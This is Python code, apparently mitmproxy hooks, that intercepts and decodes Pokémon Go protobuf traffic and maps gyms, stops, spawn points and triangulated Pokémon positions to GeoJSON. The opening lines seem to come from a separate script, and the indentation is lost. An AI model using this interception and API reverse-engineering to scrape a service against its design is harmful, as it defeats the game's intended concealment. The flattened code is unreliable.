table = driver.db.table(flow.request.url)
res = yaml.safe_load(flow.response.content)
schema_result = validator.check(res, schema)
table.insert_multiple(schema_result)
logger.info(schema_result)
rules.process_headers('response',
rule,
flow.response.headers)
if body_filename:
# 204 might be set by the skip rule in the request hook
if flow.response.status_code == 204:
flow.response.status_code = 200
flow.response.msg = 'OK'
flow.response.content = rules.body(body_filename,
context.source_dir)
def response(context, flow):
with decoded(flow.response):
if flow.match("~d pgorelease.nianticlabs.com"):
env = RpcResponseEnvelopeProto()
env.ParseFromString(flow.response.content)
key = request_api[env.response_id]
value = env.returns[0]
name = Method.Name(key)
name = mismatched_apis.get(name, name) #return class name when not the same as method
klass = underscore_to_camelcase(name) + "OutProto"
try:
mor = deserialize(value, "." + klass)
print("Deserialized Response %s" % name)
except:
print("Missing Response API: %s" % name)
if (key == GET_MAP_OBJECTS):
features = []
bulk = []
for cell in mor.MapCell:
for fort in cell.Fort:
props = {
"id": fort.FortId,
"LastModifiedMs": fort.LastModifiedMs,
}
if fort.FortType == CHECKPOINT:
props["marker-symbol"] = "circle"
props["title"] = "PokéStop"
props["type"] = "pokestop"
props["lure"] = fort.HasField('FortLureInfo')
else:
props["marker-symbol"] = "town-hall"
props["marker-size"] = "large"
props["type"] = "gym"
if fort.Team == BLUE:
props["marker-color"] = "0000FF"
props["title"] = "Blue Gym"
elif fort.Team == RED:
props["marker-color"] = "FF0000"
props["title"] = "Red Gym"
elif fort.Team == YELLOW:
props["marker-color"] = "FF0000"
props["title"] = "Yellow Gym"
else:
props["marker-color"] = "808080"
p = Point((fort.Longitude, fort.Latitude))
f = Feature(geometry=p, id=fort.FortId, properties=props)
features.append(f)
bulk.append(createItem("gym", fort.FortId, p, f.properties))
for spawn in cell.SpawnPoint:
p = Point((spawn.Longitude, spawn.Latitude))
f = Feature(geometry=p, id=len(features), properties={
"type": "spawn",
"id": len(features),
"title": "spawn",
"marker-color": "00FF00",
"marker-symbol": "garden",
"marker-size": "small",
})
features.append(f)
bulk.append(createItem("spawnpoint", 0, p, f.properties))
for spawn in cell.DecimatedSpawnPoint:
p = Point((spawn.Longitude, spawn.Latitude))
f = Feature(geometry=p, id=len(features), properties={
"id": len(features),
"type": "decimatedspawn",
"title": "Decimated spawn",
"marker-color": "000000",
"marker-symbol": "monument"
})
features.append(f)
for pokemon in cell.WildPokemon:
p = Point((pokemon.Longitude, pokemon.Latitude))
f = Feature(geometry=p, id="wild" + str(pokemon.EncounterId), properties={
"id": "wild" + str(pokemon.EncounterId),
"type": "wild",
"TimeTillHiddenMs": pokemon.TimeTillHiddenMs,
"WillDisappear": pokemon.TimeTillHiddenMs + pokemon.LastModifiedMs,
"title": "Wild %s" % Custom_PokemonName.Name(pokemon.Pokemon.PokemonId),
"marker-color": "FF0000",
"marker-symbol": "suitcase"
})
features.append(f)
bulk.append(createItem("pokemon", pokemon.EncounterId, p, f.properties))
for pokemon in cell.CatchablePokemon:
p = Point((pokemon.Longitude, pokemon.Latitude))
f = Feature(geometry=p, id="catchable" + str(pokemon.EncounterId), properties={
"id": "catchable" + str(pokemon.EncounterId),
"type": "catchable",
"ExpirationTimeMs": pokemon.ExpirationTimeMs,
"title": "Catchable %s" % Custom_PokemonName.Name(pokemon.PokedexTypeId),
"marker-color": "000000",
"marker-symbol": "circle"
})
features.append(f)
for poke in cell.NearbyPokemon:
gps = request_location[env.response_id]
if poke.EncounterId in pokeLocation:
add = True
for loc in pokeLocation[poke.EncounterId]:
if gps[0] == loc[0] and gps[1] == loc[1]:
add = False
if add:
pokeLocation[poke.EncounterId].append((gps[0], gps[1], poke.DistanceMeters/1000))
else:
pokeLocation[poke.EncounterId] = [(gps[0], gps[1], poke.DistanceMeters/1000)]
if len(pokeLocation[poke.EncounterId]) >= 3:
lat, lon = triangulate(pokeLocation[poke.EncounterId][0],pokeLocation[poke.EncounterId][1],pokeLocation[poke.EncounterId][2])
if not math.isnan(lat) and not math.isnan(lon) :
p = Point((lon, lat))
f = Feature(geometry=p, id="nearby" + str(poke.EncounterId), properties={
"id": "nearby" + str(poke.EncounterId),
"type": "nearby",
"title": "Nearby %s" % Custom_PokemonName.Name(poke.PokedexNumber),
"marker-color": "FFFFFF",
"marker-symbol": "dog-park"
})
bulk.append(createItem("pokemon", poke.EncounterId, p, f.properties))
features.append(f)
fc = FeatureCollection(features)
dump = geojson.dumps(fc, sort_keys=True)
dumpToMap(bulk)
f = open('ui/get_map_objects.json', 'w')
f.write(dump)
